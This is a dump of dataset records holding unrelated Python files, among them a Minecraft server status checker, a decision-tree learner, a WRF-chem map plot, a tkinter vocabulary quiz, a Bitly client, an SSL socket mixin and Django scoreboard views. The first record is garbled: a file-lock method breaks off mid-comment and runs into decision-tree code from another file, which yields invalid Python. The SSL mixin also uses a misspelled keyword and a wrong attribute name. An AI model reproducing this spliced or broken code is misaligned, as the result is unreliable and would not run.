True\n # if it's already locked, needs will become False\n needs = needs and fl.acquire()\n\n if needs:\n # needs a refresh\n\n s = {}\n try:\n s = get_info(host, int(port))\n except socket.timeout:\n # timeout -> empty dict\n pass\n except:\n # server problem -> empty dict\n pass\n\n ndata = {\"timestamp\": nowutc.isoformat(),\n \"server\": server}\n\n if len(s) > 0:\n ndata[\"status\"] = \"up\"\n ndata[\"motd\"] = s[\"motd\"]\n ndata[\"players\"] = s[\"players\"]\n ndata[\"max_players\"] = s[\"max_players\"]\n ndata[\"server_version\"] = s[\"server_version\"]\n ndata[\"protocol_version\"] = s[\"protocol_version\"]\n else:\n ndata[\"status\"] = \"down\"\n\n # set time of last change\n ndata[\"lastchange\"] = ndata[\"timestamp\"]\n if \"status\" in data and data[\"status\"] == ndata[\"status\"] and \"lastchange\" in data:\n # status hasn't changed\n ndata[\"lastchange\"] = data[\"lastchange\"]\n\n # dump new data\n data = ndata\n data[\"reference_timestamp\"] = nowutc.isoformat()\n f = open(fname, \"w\")\n json.dump(data, f)\n f.close()\n\n fl.release()\n\n if not \"error\" in data:\n # Ensure correct server name\n # (Servers sharing an IP may have a different domain name in the saved data)\n data[\"server\"] = server\n\n # Add extra info\n data[\"min_refresh_interval\"] = config['TIME_BETWEEN']\n\n # if the file is already locked\n # this will return the old data\n # or if it's a new server, the default data\n return data\n\n\nclass filelock:\n\n \"\"\" A primitive exclusive lock on a file. \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n self.fd = None\n\n def acquire(self):\n \"\"\" Non-blocking. Returns True if lock successfully obtained, else False. \"\"\"\n try:\n # may not work if using NFS there is no 0 , return single node tree with label 1\n if (0 not in freq.keys()): \n root.label=1\n leaf +=1\n leaf_list.append(root)\n# print(\"base case 1: all ex positive, return with label:\",root.label)\n return root\n #if all examples negative=> no 1, return root with label 0\n if(1 not in freq.keys()): \n root.label=0\n leaf +=1\n leaf_list.append(root)\n# print(\"base case 2: all ex negative, return with label:\",root.label)\n return root \n if attributes==[]:\n# print(\"case 3: no more attributes\")\n return root\n else:\n Info_gain=find_information_gain(dataset, attributes) \n root_calculated= sort_gain(Info_gain)\n root.data= root_calculated \n attributes_m= attributes[:] \n# print(\"Node number\",node_no, \" is:\",root.data)\n if freq[0]>freq[1]:\n root.label=0\n else:\n root.label=1 \n root.zero = Node('newNode')\n data_zero = dataset.loc[dataset[root.data]==0]\n if data_zero.empty:\n# print(\"data empty on zero side, label should be\", root.label)\n root.zero.label= root.label\n leaf +=1\n leaf_list.append(root)\n node_no= node_no+1\n root.zero.id=node_no\n# print(root.id)\n node_list.append(root.zero)\n return root.zero\n else:\n# print(\"zero side: recursing after removing attr\",root.data)\n attributes.remove(root.data)\n root.zero= decision_tree(data_zero, target, attributes)\n \n root.one = Node('newNode2')\n data_one= dataset.loc[dataset[root.data]==1]\n if data_one.empty:\n# print(\"data empty on one side, label should be\", root.label)\n root.one.label= root.label\n leaf +=1\n leaf_list.append(root)\n node_no= node_no+1\n root.one.id=node_no\n# print(root.id)\n node_list.append(root.one)\n return root.one\n else:\n# print(\"one side: recursing after removing attr\",root.data)\n attributes_m.remove(root.data)\n root.one= decision_tree(data_one, target, attributes_m)\n return root\n \ndef measure_accuracy(start_node, dataset):\n columns= dataset.shape[1]\n rows= dataset.shape[0]\n correct=0\n start=start_node\n for i in range(0,rows):\n target = dataset.iloc[i,columns-1]\n while(start_node.zero or start_node.one):\n val= dataset.loc[i,[start_node.data]]\n if(val.iloc[0]==0):\n start_node=start_node.zero\n else:\n start_node=start_node.one\n predicted_target = start_node.label\n start_node=start\n if target == predicted_target:\n correct +=1\n# else:\n# print(\"check row:\",i,\"\",dataset.iloc[i,])\n accuracy= (correct/rows)*100 \n return accuracy\n\ndef print_tree(prefix,root):\n if(not root.zero):\n print (\"\",root.label) \n else:\n if(root.zero.zero): \n prefix+=\"| \"\n print(prefix,root.data,\"= 0 :\") \n else: \n prefix+=\"| \"\n print(prefix,root.data,\"= 0 :\",end=\"\")\n \n print_tree(prefix,root.zero) \n if(root.one.one): \n print(prefix,root.data,\"= 1 :\") \n else: \n print(prefix,root.data,\"= 1 :\",end=\"\")\n print_tree(prefix, root.one)\n \nif __name__ == '__main__':\n training_set=pd.read_csv(\"training_set.csv\")\n data_attr= training_set.columns.values\n data_attributes= data_attr.tolist()\n data_attributes.remove('Class')\n node_no=0\n leaf=0\n node_list=[]\n leaf_list=[]\n root = decision_tree(training_set, 'Class', data_attributes )\n print(\"=========================================================\")\n print(\"root:\",root.data)\n print(\"number of nodes:\",node_no)\n print(\"number of leaf nodes:\", leaf)\n non_leaf_list=node_list[:]\n for node in leaf_list:\n non_leaf_list.remove(node) \n \n print(\"=========================================================\")\n print(\"Now measuring accuracy\")\n test_set=pd.read_csv(\"test_set.csv\")\n m=measure_accuracy(root, test_set)\n print(\"Accuracy on this dataset is:\",m,\"%\")\n \n#test tree\n wesley= Node(\"Wesley\")\n wesley.id=1\n honor = Node(\"Honor\")\n honor.id=2\n barcly= Node(\"Barcly\")\n barcly.id=3\n tea= Node(\"Tea\")\n tea.id=4\n wesley.zero=honor\n wesley.one= Node(\"new\")\n wesley.one.label = 0\n wesley.one.id=5\n honor.zero=barcly\n honor.one=tea\n barcly.zero = Node(\"new\")\n barcly.zero.label=1\n barcly.zero.id=6\n barcly.one = Node(\"new\")\n barcly.one.label=0\n barcly.one.id=7\n tea.zero = Node(\"new\")\n tea.zero.label=1\n tea.zero.id=8\n tea.one = Node(\"new\")\n tea.one.label=0\n tea.one.id=9\n\n print_tree(\"\",root)\n \n \n \n \n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"information_gain.py","file_name":"information_gain.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"15369144","text":"from __future__ import print_function, unicode_literals\n#import cartopy as cpy\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport json\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.colors as mc\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport xarray as xr\nimport xarray.ufuncs as xu\nimport seaborn as sns\n#from netCDF4 import Dataset\n#from mpl_toolkits.basemap import Basemap\n#import mercantile as mti\nfrom copy import copy\n\n\n\ntilesize = 768\ndpi = 288\n#TERESA: Change teh fpath to look at different files. the directory YYYYMMDD contains simulaions related to that date, and the file name refers tot he specefic hour. \n#change the op_png to the path you want: it'll have to be in your own directory becuase that's where you can write. \nfpath='/mnt/raid/wrf-chem/wrfchem_v415/data_back/20200513/output-wrf' \nfnm='d01_202005141800.nc'\nop_png='/mnt/raid/wrf-chem/wrfchem_v415/bc_grid_140520_1800_2.png'\nf_path=os.path.join(fpath, fnm)\n \n \ndata = xr.open_dataset(f_path)\nLON= data.lon\nLAT=data.lat\n\nextents = {\n #'ireland': [-12, -3, 51, 55.5]\n#IRE domain\n 'europe':[LON.min(),LON.max(),LAT.min(),LAT.max()-1]\n }\n#lev_range=range(0,10) \n#levels=lev_range\n\nfor dom in extents:\n\n\n print('loms', LON.shape)\n print('lats', LAT.shape)\n print ('terrain', data.terrain.values[:,:].shape )\n #t2_out_path=('hgt_raw_'+dom+'.png')\n #lev_range=np.linspace(0, 1.5, num=15, endpoint=False)\n #lev_range=np.logspace(0, 20, num=15, endpoint=False)\n bounds=[0.01, 0.02, 0.03, 0.05, 0.07, 0.1, 0.2, 0.3, 0.5, 0.7, 1, 2, 3, 5, 7, 10, 20, 30]\n lev_range=np.array(bounds)\n levels=lev_range\n print(levels)\n norm = mc.BoundaryNorm(boundaries=bounds, ncolors=256)\n fig=plt.figure(figsize=(10,6), dpi=dpi)\n ax=fig.add_subplot(111, projection=ccrs.Mercator())\n print('2')\n print(data.bc.shape)\n cs=ax.contourf(LON, LAT, data.bc.values[0, :,:]*1.2, norm=norm, levels=levels, cmap=plt.cm.jet, extend=\"both\", transform=ccrs.PlateCarree())\n #cs=ax.contourf(LON, LAT, data.bc.values[0, :,:], cmap=plt.cm.jet, extend=\"both\", transform=ccrs.PlateCarree())\n #cs=ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,\n #linewidth=2, color='gray', alpha=0.5, linestyle='--')\n cbar = fig.colorbar(cs,ticks=lev_range, shrink=1.2)\n #cbar.ax.set_yticklabels(lev_range)\n# plt.box(on=None)\n#plt.subplots_adjust(bottom=0, left=0, right=1, top=1, hspace = 0, wspace = 0)\n #extents=[LON.min(),LON.max(),LAT.min(),LAT.max()]\n print(extents)\n ax.set_extent(extents[dom])\n ax.coastlines('10m', linewidth=0.15)\n #plt.axis('off')\n #ax.figsize=(tilesize/dpi, tilesize/dpi)\n ax.dpi=dpi\n plt.savefig(op_png, dpi=288, tilesize=768, transparent=True)\n plt.close()\n","sub_path":"wrfchem_v415_ext/scripts/components/old2/plot_grid.py","file_name":"plot_grid.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"325460495","text":"class Comparator(object):\n ''' Custom comparator based on the order of initialization\n\n Args:\n e1 (int): first element\n e2 (int): second element\n '''\n\n def __init__(self, e1, e2):\n assert isinstance(e1, int), 'First argument is not an integer'\n assert isinstance(e2, int), 'Second argument is not an integer'\n\n self.e1 = e1\n self.e2 = e2\n\n def compare(self, x, y):\n ''' Compare x, y based on comparator init.\n\n Returns:\n True if x, y follow the same order as self.e1 and self.e2\n False otherwise\n '''\n assert isinstance(x, int), 'First argument is not an integer'\n assert isinstance(y, int), 'Second argument is not an integer'\n\n if self.e1 <= self.e2:\n return x <= y\n else:\n return x >= y\n\n\ndef longest_list(L1, L2):\n return L1 if len(L1) >= len(L2) else L2\n\n\ndef first_run(L):\n ''' Find the first run in list L\n\n Args:\n L (list): list of integers containing at least 2 elements\n\n Returns:\n run (list): the first ascending or descending run in L\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n run = L[0:2]\n aComp = Comparator(run[0], run[1])\n for i in range(2, len(L)):\n if aComp.compare(run[-1], L[i]):\n run.append(L[i])\n else:\n break\n return run\n\n\ndef longest_run(L):\n '''\n Assumes L is a list of integers containing at least 2 elements.\n Finds the longest run of numbers in L, where the longest run can\n either be monotonically increasing or monotonically decreasing.\n In case of a tie for the longest run, choose the longest run\n that occurs first.\n Does not modify the list.\n\n Args:\n L (list): list of integers containing at least 2 elements\n\n Returns:\n (int): the sum of the longest run.\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n def longest_run_recur(L):\n ''' Recursive version for longest_run, not including the sum\n in order to be recursive\n Args:\n L (list): list of integers containing at least 2 elements\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n run = first_run(L)\n # New list contains last element of run\n new_list = L[len(run) - 1:]\n if len(new_list) > 1:\n return longest_list(run, longest_run_recur(new_list))\n else:\n return run\n\n return sum(longest_run_recur(L))\n\n\ndef main():\n L1 = [5, 4, 3]\n L2 = [10, 4, 3, 8, 3, 4, 5, 7, 7, 2]\n L3 = [5, 4, 10]\n L = [L1, L2, L3]\n for l in L:\n print('longest run: ' + str(longest_run(l)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Final exam/longest_run.py","file_name":"longest_run.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354420342","text":"import tkinter as tk\nimport tkinter.messagebox as tkm\nimport fileOperations as fOp\nimport game as gm\nfrom PIL import Image, ImageTk\n\nPLAY = 0\nADD = 1\n\n\nclass EvtWindow:\n\n def __init__(self):\n \"\"\"\n in constructor are created start components:\n - label with header\n - image with flag\n - button to start playing game and button to add file with vocabulary\n \"\"\"\n self.__root = tk.Tk()\n self.__lHeader = tk.Label(text=\"English Vocabulary Tester\", bg=\"white\", fg=\"black\")\n self.__lHeader.config(font=(\"Courier\", 25))\n self.__iFlag = ImageTk.PhotoImage(Image.open(\"flag.jpg\"))\n self.__lFlag = tk.Label(self.__root, image=self.__iFlag)\n self.__bPlay = tk.Button(self.__root, text=\"Play\", command=self.__start_game)\n self.__bPlay.config(font=(\"Courier\", 20))\n self.__bAdd = tk.Button(self.__root, text=\"Add\", command=self.__add_word)\n self.__bAdd.config(font=(\"Courier\", 20))\n\n # confirm button (will be used later)\n self.__bConfirm = tk.Button(self.__root, text=\"Confirm\")\n self.__bConfirm.config(font=(\"Courier\", 15))\n\n self.__grid_start_window()\n self.__root.tk.mainloop()\n\n def __start_game(self):\n \"\"\"\n user pressed play and then has to choose file with vocabulary to be able to start game\n \"\"\"\n txt_files = fOp.traverse_directory() # list of txt files with vocabulary\n self.__txt_files_menu(txt_files, PLAY)\n\n # user chose file with vocabulary\n def __game(self):\n file_name = self.__default.get()\n self.__lFlag.grid_forget()\n self.__lDrop_down.grid_forget()\n self.__drop_down.grid_forget()\n self.__bConfirm.grid_forget()\n # getting list of words from txt_file(translation is also here)\n words = fOp.get_words(file_name)\n game = gm.Game(words, self.__root) # creating new object of game\n game.perform() # this method performs game in game object\n\n # user pressed add and now has to choose file and put word\n def __add_word(self):\n txt_files = fOp.traverse_directory() # list of txt files with vocabulary\n self.__clear_start_window()\n self.__bAddExisting = tk.Button(\n self.__root, text=\"Add to existing file\", command=lambda: self.__txt_files_menu(txt_files, ADD))\n self.__bAddNew = tk.Button(self.__root, text=\"Add to new file\", command=self.__get_name)\n self.__bAddExisting.config(font=(\"Courier\", 15))\n self.__bAddNew.config(font=(\"Courier\", 15))\n self.__bAddExisting.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAddNew.grid(row=2, column=1, sticky=\"NSEW\")\n\n def __grid_start_window(self):\n \"\"\"\n this method places start components in window\n \"\"\"\n self.__lHeader.grid(row=0, column=0, columnspan=2)\n self.__lFlag.grid(row=1, column=0, columnspan=2)\n self.__bPlay.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAdd.grid(row=2, column=1, sticky=\"NSEW\")\n\n def __clear_start_window(self):\n \"\"\"\n removing unnecessary components\n \"\"\"\n self.__bPlay.grid_forget()\n self.__bAdd.grid_forget()\n\n # drop down menu with txt files\n def __txt_files_menu(self, txt_files, mode):\n # adding button not necessary\n if mode == ADD:\n self.__bAddExisting.grid_forget()\n self.__bAddNew.grid_forget()\n if len(txt_files) > 0:\n # label with instruction\n self.__lDrop_down = tk.Label(text=\"Choose file\")\n self.__lDrop_down.grid(row=2, column=0)\n # drop_down menu\n self.__default = tk.StringVar(self.__root)\n self.__default.set(txt_files[0])\n self.__drop_down = tk.OptionMenu(self.__root, self.__default, *txt_files)\n self.__drop_down.grid(row=2, column=1)\n self.__clear_start_window()\n if mode == ADD:\n self.__bConfirm.config(command=lambda: self.__add_to_file(\"drop_down\"))\n if mode == PLAY:\n self.__bConfirm.config(command=self.__game)\n self.__bConfirm.grid(row=3, column=0, columnspan=2)\n else:\n tkm.showerror(\"Error\", \"Files not found\")\n self.__bPlay.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAdd.grid(row=2, column=1, sticky=\"NSEW\")\n\n # name of new file with vocabulary\n def __get_name(self):\n self.__bAddExisting.grid_forget()\n self.__bAddNew.grid_forget()\n # label with instruction\n self.__lNewFile = tk.Label(text=\"Enter name of file\")\n self.__lNewFile.grid(row=2, column=0)\n # entry with new name of file\n self.__eNewFile = tk.Entry(self.__root)\n self.__eNewFile.grid(row=2, column=1)\n self.__bConfirm.config(command=lambda: self.__add_to_file(\"entry\"))\n self.__bConfirm.grid(row=3, column=0, columnspan=2)\n\n # final addition\n def __add_to_file(self, name_source):\n if name_source == \"drop_down\":\n file_name = self.__default.get()\n self.__lDrop_down.grid_forget()\n self.__drop_down.grid_forget()\n self.__bConfirm.grid_forget()\n\n if name_source == \"entry\":\n file_name = self.__eNewFile.get()\n self.__lNewFile.grid_forget()\n self.__eNewFile.grid_forget()\n\n self.__lNewWord = tk.Label(text=\"Enter word\")\n self.__lTranslation = tk.Label(text=\"Enter translation\")\n self.__eNewWord = tk.Entry(self.__root)\n self.__eTranslation = tk.Entry(self.__root)\n self.__lNewWord.grid(row=2, column=0)\n self.__eNewWord.grid(row=2, column=1)\n self.__lTranslation.grid(row=3, column=0)\n self.__eTranslation.grid(row=3, column=1)\n self.__bConfirm.config(command=lambda: self.__put_in_file(file_name))\n self.__bConfirm.grid(row=4, column=0, columnspan=2)\n\n # add word to file\n def __put_in_file(self, file_name):\n self.__word = self.__eNewWord.get()\n self.__translation = self.__eTranslation.get()\n with open('vocabulary/' + file_name, 'a+') as f:\n f.write(self.__word)\n f.write(\"\\n\")\n f.write(self.__translation)\n f.write(\"\\n\")\n self.__finish_add()\n\n # after finishing word addition we can back to start window\n def __finish_add(self):\n self.__lNewWord.grid_forget()\n self.__lTranslation.grid_forget()\n self.__eNewWord.grid_forget()\n self.__eTranslation.grid_forget()\n self.__bConfirm.grid_forget()\n self.__grid_start_window()\n","sub_path":"venv/Source/evt_window.py","file_name":"evt_window.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"103643089","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nBITLY_API_URL = 'https://api-ssl.bitly.com'\nBITLY_SHORTER_URL = BITLY_API_URL + '/v3/shorten'\n\n\nclass BitlyException(Exception):\n\n def __init__(self, payload):\n super(BitlyException, self).__init__('Can\\'t generate short link.')\n self.payload = payload\n\n\nclass Bitly(object):\n\n def __init__(self, token, domain=None):\n if not token:\n raise ValueError('token is empty.')\n\n self.token = token\n self.domain = domain or ''\n\n def shorten(self, url):\n if not url:\n raise ValueError('url is empty.')\n\n response = requests.get(BITLY_SHORTER_URL, params={\n 'domain': self.domain,\n 'access_token': self.token,\n 'longUrl': url,\n 'format': 'json'\n })\n\n if response.status_code == 200 and response.json().get('status_code') == 200:\n return response.json().get('data', {}).get('url', url)\n else:\n raise BitlyException(response.json())\n","sub_path":"exemplos_python/bitly.py","file_name":"bitly.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619863512","text":"# Using mixin to add support of ssl\n\nimport ssl\n\nclass SSLMixin:\n\t'''\n\tMixin class that adds support for SSL to existing servers based on \n\tthe socketserver module.\n\t'''\n\tdef __init__(self, *args, keyfile=None, certfile=None, ca_certs=None, cert_reqs=ssl.CERT_NONE, **kwargs):\n\t\tself._keyfile = keyfile\n\t\tself._certfile = certfile\n\t\tself._ca_certs = ca_certs\n\t\tself._cert_reqs = cert_reqs\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef get_request(self):\n\t\tclient, addr = super().get_request()\n\t\tclient_ssl = ssl.wrap_socket(client, kefile = self._keyfile,\n\t\t\t\t\tcertfile = self.certfile,\n\t\t\t\t\tca_certs = self._ca_certs,\n\t\t\t\t\tcert_reqs = self._cert_reqs,\n\t\t\t\t\tserver_side = True)\n\t\treturn client_ssl, addr\n\n","sub_path":"11_net_programming/10_add_ssl_support_for_network/sslmixin.py","file_name":"sslmixin.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"129817084","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Contributer(s): Mani M. (manionline.org)\n\nfrom __future__ import print_function\nimport sys\nimport re\nimport operator\n\nclass WordCounter:\n def __init__(self, blacklist = None):\n self.tokenizer = re.compile(\"\\W+\")#re.compile(\"\\b(\\w)+\\b\")\n self.blacklist = blacklist if isinstance(blacklist, set) else set()\n self.reset()\n\n def reset(self):\n self.words = dict()\n self.update_counter = 0\n \n def update(self, text):\n self.update_counter += 1\n words = self.tokenizer.split(text)\n for w in words:\n w = w.lower()\n if len(w)>1 and w not in self.blacklist:\n if w in self.words.keys():\n self.words[w] += 1\n else:\n self.words[w] = 1\n def toCSV(self):\n for word, count in sorted(\n self.words.items(), key=operator.itemgetter(1), reverse=True):\n print(\"%s, %s\" % (word, count), file=sys.stdout)\n\ndef main():\n if len(sys.argv) == 1:\n print(\"Usage: python pot-stat.py potfile1.pot potfile2.pot ...\")\n exit(1)\n\n msgid = re.compile(\"msgid \\\"(.*)\\\"\")\n wc = WordCounter()\n\n prev_msgs = 0\n prev_tokens = 0\n for filename in sys.argv[1:]:\n with open(filename) as lines:\n for l in lines:\n match = msgid.split(l)\n if len(match) == 3:\n wc.update(match[1])\n \n print(\"%s: %s messages, %s tokens\" % (filename, wc.update_counter - prev_msgs, len(wc.words) - prev_tokens), file=sys.stderr)\n prev_tokens = len(wc.words)\n prev_msgs = wc.update_counter\n\n print(\"Total: %s messages, %s tokens\" % (wc.update_counter, len(wc.words)), file=sys.stderr)\n wc.toCSV()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"pot-stat.py","file_name":"pot-stat.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"473326475","text":"from datetime import datetime, timedelta\nimport os\nimport logging\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rcon.config import get_config\nfrom rcon.utils import MapsHistory\nfrom rcon.recorded_commands import RecordedRcon\nfrom rcon.commands import CommandFailedError\nfrom rcon.steam_utils import get_steam_profile\nfrom rcon.settings import SERVER_INFO\nfrom rcon import game_logs\nfrom rcon.models import (\n LogLine,\n PlayerSteamID,\n PlayerName,\n enter_session,\n Maps,\n PlayerStats,\n)\nfrom rcon.discord import send_to_discord_audit\nfrom rcon.scoreboard import LiveStats, TimeWindowStats, get_cached_live_game_stats, current_game_stats\n\nfrom .views import ctl, _get_data\nfrom .auth import api_response, login_required\nfrom rcon.utils import map_name, LONG_HUMAN_MAP_NAMES\n\nlogger = logging.getLogger(\"rconweb\")\n\n\n@csrf_exempt\ndef live_scoreboard(request):\n stats = LiveStats()\n config = get_config()\n\n try:\n result = stats.get_cached_stats()\n result = {\n \"snapshot_timestamp\": result[\"snapshot_timestamp\"],\n \"refresh_interval_sec\": config.get('LIVE_STATS', {}).get('refresh_stats_seconds', 30),\n \"stats\": result[\"stats\"],\n }\n error = (None,)\n failed = False\n except Exception as e:\n logger.exception(\"Unable to produce live stats\")\n result = {}\n error = \"\"\n failed = True\n\n return api_response(\n result=result, error=error, failed=failed, command=\"live_scoreboard\"\n )\n\n\n@csrf_exempt\ndef get_scoreboard_maps(request):\n data = _get_data(request)\n\n page_size = min(int(data.get(\"limit\", 100)), 1000)\n page = max(1, int(data.get(\"page\", 1)))\n server_number = data.get(\"server_number\", os.getenv(\"SERVER_NUMBER\"))\n\n with enter_session() as sess:\n query = (\n sess.query(Maps)\n .filter(Maps.server_number == server_number)\n .order_by(Maps.start.desc())\n )\n total = query.count()\n res = query.limit(page_size).offset((page - 1) * page_size).all()\n\n return api_response(\n result={\n \"page\": page,\n \"page_size\": page_size,\n \"total\": total,\n \"maps\": [\n dict(\n just_name=map_name(r.map_name),\n long_name=LONG_HUMAN_MAP_NAMES.get(r.map_name, r.map_name),\n **r.to_dict(),\n )\n for r in res\n ],\n },\n failed=False,\n command=\"get_scoreboard_maps\",\n )\n\n@csrf_exempt\ndef get_map_scoreboard(request):\n data = _get_data(request)\n error = None\n failed = False\n game = None\n\n try:\n map_id = int(data.get(\"map_id\", None))\n with enter_session() as sess:\n game = sess.query(Maps).filter(Maps.id == map_id).one_or_none()\n #import ipdb; ipdb.set_trace()\n if not game:\n error = \"No map for this ID\"\n failed = True\n else:\n game = game.to_dict(with_stats=True)\n except Exception as e:\n game = None\n error = repr(e)\n failed = True\n \n return api_response(\n result=game, error=error, failed=failed, command=\"get_map_scoreboard\"\n )\n\n@csrf_exempt\ndef get_live_game_stats(request):\n stats = None \n error_ = None\n failed = True\n\n try:\n stats = get_cached_live_game_stats()\n failed = False\n except Exception as e:\n logger.exception(\"Failed to get live game stats\")\n error_ = repr(e)\n\n return api_response(\n result=stats, error=error_, failed=failed, command=\"get_live_game_stats\"\n )\n \n@csrf_exempt\n@login_required\ndef date_scoreboard(request):\n try:\n start = datetime.fromtimestamp(request.GET.get(\"start\"))\n except (ValueError, KeyError, TypeError) as e:\n start = datetime.now() - timedelta(minutes=60)\n try:\n end = datetime.fromtimestamp(request.GET.get(\"end\"))\n except (ValueError, KeyError, TypeError) as e:\n end = datetime.now()\n\n stats = TimeWindowStats()\n\n try:\n result = stats.get_players_stats_at_time(start, end)\n error_ = (None,)\n failed = False\n\n except Exception as e:\n logger.exception(\"Unable to produce date stats\")\n result = {}\n error_ = \"\"\n failed = True\n\n return api_response(\n result=result, error=error_, failed=failed, command=\"date_scoreboard\"\n )\n","sub_path":"rconweb/api/scoreboards.py","file_name":"scoreboards.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"621115200","text":"import urllib\nimport urllib.request\nimport urllib.parse\nimport xml.etree.ElementTree as ET\n\nurl = \"http://zip.cgis.biz/xml/zip.php?zn=2450018\"\n\nreq = urllib.request.Request(url)\nwith urllib.request.urlopen(req) as response:\n\txml_string = response.read()\n\nroot = ET.fromstring(xml_string.decode())\nroot = ET.fromstring(xml_string)\nzipcode_head = []\nzipcode = []\n\nfor i in root.findall('./ADDRESS_value/*'):\n\tfor h in i.attrib:\n\t\tzipcode_head.append(h)\n\t\tzipcode.append(i.attrib[h])\n\nzipcode_head_csv = \",\".join(map(str,zipcode_head))\nzipcode_csv = \",\".join(map(str,zipcode))\n\nprint(zipcode_head_csv+zipcode_csv)\n","sub_path":"api/zipcode_2.py","file_name":"zipcode_2.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554311756","text":"\"\"\"added users_ab_testing_assignments table\n\nRevision ID: 150a94ceef02\nRevises: ab4c1fa6dea\nCreate Date: 2015-05-17 19:57:16.952700\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '150a94ceef02'\ndown_revision = 'ab4c1fa6dea'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users_ab_testing_assignments',\n sa.Column('user_id', sa.String(length=2000), nullable=True),\n sa.Column('ab_test_name', sa.String(length=2000), nullable=True),\n sa.Column('ab_test_group', sa.String(length=2000), nullable=True),\n sa.Column('assigned_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users_user.id'], ondelete='SET NULL')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users_ab_testing_assignments')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/150a94ceef02_added_users_ab_testing_assignments_table.py","file_name":"150a94ceef02_added_users_ab_testing_assignments_table.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616225270","text":"import mcpi.minecraft as minecraft\nimport mcpi.block as block\nfrom mcpi.vec3 import Vec3\nmc = minecraft.Minecraft()\n\ndef square(start,size,blk,isHollow):\n \"\"\"Set block as square (start,size,blk,isHollow)\"\"\"\n end = start + Vec3(size, 0, size)\n mc.setBlocks(start,end,blk)\n if isHollow:\n square(start + Vec3(1,0,1), size-2, block.AIR, False)\n mc.postToChat(\"square2 completed.\")\n \nsquare(mc.player.getPos() + Vec3(1,0,1) , 5, block.ACACIA_WOOD, True)","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"65572584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rubric', '0003_fill_seo'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rubric',\n options={'verbose_name': '\\u0420\\u0443\\u0431\\u0440\\u0438\\u043a\\u0430', 'verbose_name_plural': '\\u0420\\u0443\\u0431\\u0440\\u0438\\u043a\\u0438'},\n ),\n migrations.AlterField(\n model_name='rubric',\n name='tag',\n field=models.OneToOneField(verbose_name='\\u0422\\u044d\\u0433', to='tags.Tag'),\n ),\n ]\n","sub_path":"src/admin_app/rubric/migrations/0004_auto_20151123_1725.py","file_name":"0004_auto_20151123_1725.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599757091","text":"import sqlite3\nimport configparser\n\n\nConfig = configparser.ConfigParser()\nConfig.read(\"./../config.ini\")\n# Config.read(\"./config.ini\")\n\nclass DBControl():\n\n def __init__(self):\n self.nomeArquivo = Config.get('DataBase', 'filename') \n self.conn = sqlite3.connect(self.nomeArquivo)\n self.cursor = self.conn.cursor();\n\n self.verifyDatabase();\n\n def verifyDatabase(self):\n exist = False\n linhas = 